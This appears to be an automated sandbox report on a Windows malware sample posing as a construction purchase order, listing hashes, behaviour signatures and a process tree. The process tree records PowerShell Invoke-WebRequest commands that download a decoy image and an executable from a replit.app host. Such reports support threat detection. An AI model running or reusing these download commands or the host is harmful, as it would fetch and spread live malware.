Analysis

max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 30-07-2024 01:19

Static task: static1
Behavioral task: behavioral1
Sample: jdconstructnOrderfdp..exe
Resource: win7-20240704-en

General

Target: jdconstructnOrderfdp..exe
Size: 288KB
MD5: 7e900eb50f9dc1cb5c68ffea4b9e7bcc
SHA1: 4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
SHA256: 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
SHA512: a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
SSDEEP: 3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t

Malware Config
Signatures
Processes:
pid   process
1100  powershell.exe
2488  powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description   ioc                                                          process
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  jdconstructnOrderfdp..exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid   process
1100  powershell.exe
2488  powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  1100  powershell.exe
Token: SeDebugPrivilege  2488  powershell.exe
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
description                        pid   process                    target process
PID 1720 wrote to memory of 2532   1720  jdconstructnOrderfdp..exe  cmd.exe
PID 1720 wrote to memory of 2532   1720  jdconstructnOrderfdp..exe  cmd.exe
PID 1720 wrote to memory of 2532   1720  jdconstructnOrderfdp..exe  cmd.exe
PID 1720 wrote to memory of 2532   1720  jdconstructnOrderfdp..exe  cmd.exe
PID 2532 wrote to memory of 1100   2532  cmd.exe                    powershell.exe
PID 2532 wrote to memory of 1100   2532  cmd.exe                    powershell.exe
PID 2532 wrote to memory of 1100   2532  cmd.exe                    powershell.exe
PID 2532 wrote to memory of 2488   2532  cmd.exe                    powershell.exe
PID 2532 wrote to memory of 2488   2532  cmd.exe                    powershell.exe
PID 2532 wrote to memory of 2488   2532  cmd.exe                    powershell.exe
Processes

C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1720

  C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0EF.tmp\C0F0.tmp\C0F1.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
    - Suspicious use of WriteProcessMemory
    PID:2532

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:1100

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:2488
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 334B
  MD5: 9aaac0122442ca0ebb4d8bb795e86676
  SHA1: 594744d8e4d51273dd435c3fac5799bc5f180e8c
  SHA256: 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
  SHA512: d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 1a584b347be98003da08bae1e0e9a2c8
  SHA1: 233f831a5c1fbbc67ee5b84dfd2f26644d94cb25
  SHA256: d94062ddb6c8e257ca866fcb229fd7bc2b82e89244a2e05ab052f943a333b7e2
  SHA512: 07d7c92a2900c9b94109216a59cf4c5a1b2b2c791b30c88f4ade37b782c59f8fcf5d46b3ec22965aea5e12c4acf0e764d05ec312b332826130deaa0c8ef443c2